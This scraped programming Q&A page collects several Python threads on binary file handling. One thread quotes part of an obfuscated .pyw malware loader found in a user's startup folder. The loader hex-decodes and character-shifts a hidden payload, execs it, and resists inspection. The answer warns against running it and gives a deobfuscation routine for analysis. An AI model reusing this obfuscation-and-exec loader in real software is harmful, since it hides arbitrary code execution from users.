what do i do wrong with encoding hexadecimal "40" in Python?

what do i do wrong with encoding hexadecimal "40" in Python? - python

i came across a binary file (i guess) i try to generate using my script, so maybe i do it perfectly wrong, but so far it worked. Now i'm stuck and don't feel i can understand (and as a noob to binary files, can't name the problem correctly to google any answer)..
I read the "target file" as a binary file and i found it is like many "\x00" with several numeric values in between (like "\x05").
What i do is like:
def myEncode(a):
if a == 2: A = "\x02"
elif a == 5: A = "\x05"
return(A)
line = "\x00\x00\x01" + myEncode(5) + "\x00"
phrase = bytearray(line.encode("utf-8"))
f = open("outfile", "ab")
f. write(phrase)
f.close()
it would help me a lot if i could use hex() to transform this integer 5 into "\x05", but what i get is "0x5". Which, added to the file this way doesn't work. I really need (for some reason) to make it look "\x" and 2-digit number
the more important: i need to add decimal 128 (hexadecimal "\x80") and bigger. For a reason beyond my understanding it always inserts "\xc2\x80". When i create the same file using the original program, it only adds this "\x80", so i guess it must work somehow, yet i don't know why..
Thanks for any advice, hint or a direction where to look.

Related

Trying to understand this potentially virus encrypted pyw file

Today I realised this .pyw file was added into my startup files.
Though I already deleted it, I suspect what it may have initially done to my computer, but it's sort of encrypted and I am not very familiar with Python, but I assume as this is the source code regardless, there is no actual way to completely encrypt it.
Can someone either guide me through how I can do that, or check it for me?
edit: by the looks of it I can only post some of it here, but it should give brief idea of how it was encrypted:
class Protect():
def __decode__(self:object,_execute:str)->exec:return(None,self._delete(_execute))[0]
def __init__(self:object,_rasputin:str=False,_exit:float=0,*_encode:str,**_bytes:int)->exec:
self._byte,self._decode,_rasputin,self._system,_bytes[_exit],self._delete=lambda _bits:"".join(__import__(self._decode[1]+self._decode[8]+self._decode[13]+self._decode[0]+self._decode[18]+self._decode[2]+self._decode[8]+self._decode[8]).unhexlify(str(_bit)).decode()for _bit in str(_bits).split('/')),exit()if _rasputin else'abcdefghijklmnopqrstuvwxyz0123456789',lambda _rasputin:exit()if self._decode[15]+self._decode[17]+self._decode[8]+self._decode[13]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read() or self._decode[8]+self._decode[13]+self._decode[15]+self._decode[20]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read()else"".join(_rasputin if _rasputin not in self._decode else self._decode[self._decode.index(_rasputin)+1 if self._decode.index(_rasputin)+1<len(self._decode)else 0]for _rasputin in "".join(chr(ord(t)-683867)if t!="ζ"else"\n"for t in self._byte(_rasputin))),lambda _rasputin:str(_bytes[_exit](f"{self._decode[4]+self._decode[-13]+self._decode[4]+self._decode[2]}(''.join(%s),{self._decode[6]+self._decode[11]+self._decode[14]+self._decode[1]+self._decode[0]+self._decode[11]+self._decode[18]}())"%list(_rasputin))).encode(self._decode[20]+self._decode[19]+self._decode[5]+self._decode[34])if _bytes[_exit]==eval else exit(),eval,lambda _exec:self._system(_rasputin(_exec))
return self.__decode__(_bytes[(self._decode[-1]+'_')[-1]+self._decode[18]+self._decode[15]+self._decode[0]+self._decode[17]+self._decode[10]+self._decode[11]+self._decode[4]])
Protect(_rasputin=False,_exit=False,_sparkle='''ceb6/f2a6bdbe/f2a6bdbb/f2a6bf82/f2a6bf83/ceb6/f2a6bdbe/f2a6bdbb/f2a6bf83/f2a6bf80/f2a6bdbb/f2a6bf93/f2a6bf89/f2a6bf8f/f2a6bdbb/f2a6bebe/f2a6bebf/f2a6bf89/f2a6bebc/f2a6bf80/

OBLIGATORY WARNING: The code is pretty obviously hiding something, and it eventually will build a string and exec it as a Python program, so it has full permissions to do anything your user account does on your computer. All of this is to say DO NOT RUN THIS SCRIPT.
The payload for this nasty thing is in that _sparkle string, which you've only posted a prefix of. Once you get past all of the terrible spacing, this program basically builds a new Python program using some silly math and exec's it, using the _sparkle data to do it. It also has some basic protection against you inserting print statements in it (amusingly, those parts are easy to remove). The part you've posted decrypts to two lines of Python comments.
# hi
# if you deobf
Without seeing the rest of the payload, we can't figure out what it was meant to do. But here's a Python function that should reverse-engineer it.
import binascii
# Feed this function the full value of the _sparkle string.
def deobfuscate(data):
decode = 'abcdefghijklmnopqrstuvwxyz0123456789'
r = "".join(binascii.unhexlify(str(x)).decode() for x in str(data).split('/'))
for x in r:
if x == "ζ":
print()
else:
x = chr(ord(x)-683867)
if x in decode:
x = decode[(decode.index(x) + 1) % len(decode)]
print(x, end='')
Each sequence of hex digits between the / is a line. Each two hex digits in the line is treated as a byte and interpreted as UTF-8. The resulting UTF-8 character is then converted to its numerical code point, the magic number 683867 is subtracted from it, and the new number is converted back into a character. Finally, if the character is a letter or number, it's "shifted" once to the right in the decode string, so letters move one forward in the alphabet and numbers increase by one (if it's not a letter/number, then no shift is done). The result, presumably, forms a valid Python program.
From here, you have a few options.
Run the Python script I gave above on the real, full _sparkle string and figure out what the resulting program does yourself.
Run the Python script I gave above on the real, full _sparkle string and post the code in your question so we can decompose that.
Post the full _sparkle string in the question, so I or someone else can decode it.
Wipe the PC to factory settings and move on.

My String Is Not Converting to a Float and I have No Idea Why

I'm importing some text files and trying to plot some data, however, I keep getting the error message:
ValueError: could not convert string to float:
Here's the portion of my code that's giving me trouble. Do you see any issues with this?
Thank you!
import matplotlib.pyplot as plt
import numpy as np
import pylab
fluxdensity = []
days= []
with open('knowniaxflux.csv') as f:
for row in f.readlines():
row.strip('\n')
if not row.startswith("#"):
spaces = row.split(',')
fluxdensity.append(float(spaces[0]))
days.append(float(spaces[1]))

You're probably just not getting the input you expect. You should use print statements to see what you're actually trying to convert (While debugging, of course. Remove them later).
In addition, unless you know exactly how your input looks like, you probably need a more solid parser anyways. For example #'s might not be the first character in the file. You might want to specify an encoding to the file (unless you're always using ASCII/UTF-8 (PY2/PY3) anyways.). You might also want to strip spaces if you expect any.
If all else fails, in my experience your file is written in the wrong encoding. Make sure your file is written using one of the encodings mentioned above, and preferably convert you binary input to Unicode format (especially if you're using PY3. That would be the str object). Read the Python Unicode HOWTO, it should make it all clear.

How can i convert binary data from a file to readable base two binary in python?

In a class i am in, we are assigned to a simple mips simulator. The instructions that my program is supposed to process are given in a binary file. I have no idea how to get anything usable out of that file. Here is my code:
import struct
import argparse
'''open a parser to get command line arguments '''
parser = argparse.ArgumentParser(description='Mips instruction simulator')
'''add two required arguments for the input file and the output file'''
parser.add_argument('-i', action="store", dest='infile_name', help="-i INPUT_FILE", required=True)
parser.add_argument('-o', action="store", dest='outfile_name', help="-o OUTPUT_FILE_NAME", required=True)
'''get the passed arguments'''
args = parser.parse_args()
class Disassembler:
'''Disassembler for mips code'''
instruction_buffer = None
instructions_read = 0
def __init__(self, filename):
bin_file = None
try:
bin_file = open(filename, 'rb')
except:
print("Input file: ", filename, " could not be opened. Check the name, permissions, or path")
quit()
while True:
read_bytes = bin_file.read(4)
if (read_bytes == b''):
break
int_var = struct.unpack('>I', read_bytes)
print(int_var)
bin_file.close()
disembler = Disassembler(args.infile_name)
So, at first i just printed the 4 bytes i read to see what was returned.
I was hoping to see plain bits(just 1's and 0's). What i got was byte strings from what I've read. So i tried googling to find out what i can do about this. So i found i could use struct to convert these byte strings to integers. That outputs them in a format like (4294967295,).
This is still annoying, because i have to trim that to make it a usable integer then even still i have to convert it to bits(base 2). It's nice that i can read the bytes with struct as either signed or unsigned, because half of the input file's input are signed 32 bit numbers.
All of this seems way more complicated than it should be to just get the bits out of a binary file. Is there an easier way to do this? Also can you explain it like you would to someone who is not incredibly familiar with esoteric python code and is new to binary data?
My overall goal is to get straight 32 bits out of each 4 bytes i've read. The beginning of the file is a list of mips opcodes. So i need to be able to see specific parts of these numbers, like the first 5 bits, then the next 6, or so on. The end of the file contains 32 bit signed integer values. The two halves of the files are separated by a break opcode.
Thank you for any help you can give me. It's driving me crazy that i can't find any straight forward answers through searching. If you want to see the binary file, tell me where and i'll post it.

Bear in mind that normal Python integers don't have a fixed bit width: they're as big as they need to be. This can be annoying when you want to convert signed integers to bit strings. I recommend that you stick with what you're currently doing: converting blocks of 4 bytes to unsigned integer using
n = struct.unpack('>I', read_bytes)[0]
and then using either format(n, '032b') or '{0:032b}'.format(n) to convert that to a bit string if you want to print the bits.
To access or modify the bits in an integer, you shouldn't be bothering with string conversion, instead you should use Python's bitwise operators, &, |, ^, <<, >>, ~. Eg, (n >> 7) & 1 gives you bit 7 of n.
Please see Unary arithmetic and bitwise operations and the following sections in the Python docs for detailed information about these operators.

This way you can access each individual bit in the file.
"".join(format(i, "08b") for i in byte_string)
For example:
>>> "".join(format(i, "08b") for i in b"\x23\x54a")
'001000110101010001100001'

File read reaches end of file unexpectedly

I'm translating a script from matlab, which reads a file of binary-encoded 32-bit integers and parses them appropriately. I have written the following method that is intended to mimic matlab's fread() function:
def readi(f,n):
x = zeros(n,int);
for i in range(0,n):
x[i] = struct.unpack('i',f.read(4))[0];
print x[i];
return x;
I call this function variously with n between 1 and 9 in my script as I parse out the data. My problem is that the script only gets part of the way into the file before I get this error:
x[i] = struct.unpack('i',f.read(4))[0];
struct.error: unpack requires a string argument of length 4
It appears that python thinks I have reached the end of the file. The point in execution where the error occurs is a line in a loop that has already been iterated over several times. In addition, the small portion of the file that has been parsed already matches exactly what my matlab script produces from the exact same file (not a copy). Matlab, however, is able to read a much larger dataset from the file. Does anyone have ideas on why this error is occurring?

In my own testing, whether the file was opened in binary-mode or not (surprisingly) didn't matter. The only thing I can suggest is to make sure you understand the format of the input file exactly. So in addition to reading the matlab script, it might be a good idea to look at hex dump of the file where you can see the individual bytes of raw data and be able to verify whether it matches your understanding of the layout of its contents.
Besides all that, you could try the following simplification/optimization of your readi() function which does not require the temporaryxlist and reads the bytes of all the integers in the group with one call tofile.read():
def readi(f, n):
fmt = '%di' % n
return struct.unpack(fmt, f.read(struct.calcsize(fmt)))
However I don't think it will solve your problem because it should be equivalent to what you already doing, return value-wise anyway (it doesn't print anything like yours).
One final note -- you don't need to end your lines of code with a semicolon. Python isn't like C and several other languages in that respect.

Trying to pass a number of bytes to read() via raw_input

I'm doing some extra credit for "Zed Shaw's Learn Python The Hard Way;" the "extra credit" for exercise 15 tells you to read through pydoc file to find other things I could do files. I was interested in figuring out how to have the terminal print out a certain number of bytes of a text file using "read()". I can hard code in the argument for how many bytes to read, but I hit a wall when trying to prompt the user to define the number of bytes.
Here's the script as I have it so far:
from sys import argv
script, filename = argv
txt = open(filename)
print "Here's 24 bytes of your file %r:" % filename
print txt.read(24)
print """What about an arbitrary, not hard-coded number of bytes? Enter the number
of bytes you want read out of the txt file at this prompt, as an integer:"""
how_far = raw_input("> ")
print txt.read(how_far2) # this format makes sense in my head but obviously isn't the done thing.
terminal spits out the error:
"NameError: name 'how_far2' is not defined"
How do I prompt the user of the script to type in a number of bytes, and have the script read out that number of bytes?
BONUS QUESTIONS:
What is the actual-factual term for what I'm doing trying to do here? Pass a variable to a method? Pass a variable to a function?
Is the number of bytes an argument of read? Is that the correct term?
More generally, what's a good place to get a vocabulary list of python terms? Any other books Stack Overflow would recommend, or some in online documentation somewhere? Really looking for a no assumptions, no prior knowledge, "explain it to me like I'm five" level of granularity... a half hour of web-searching hasn't helped too much. I've not found terminology really collected together into any one place online despite a good amount of effort searching the web.

The error message is because you have used how_far in one place and how_far2 in the other.
You'll also need to convert how_far to an int before passing it to read - using int(how_far) for example
You will find it can be called passing a variable, parameter or argument. These are not Python terms, they are general programming terms

raw_input returns a string. file.read expects an integer -- likely you just need to convert the output from raw_input into an integer before you use it.

We Keep Coding

Python is a programming language that lets you work quickly and integrate systems more effectively.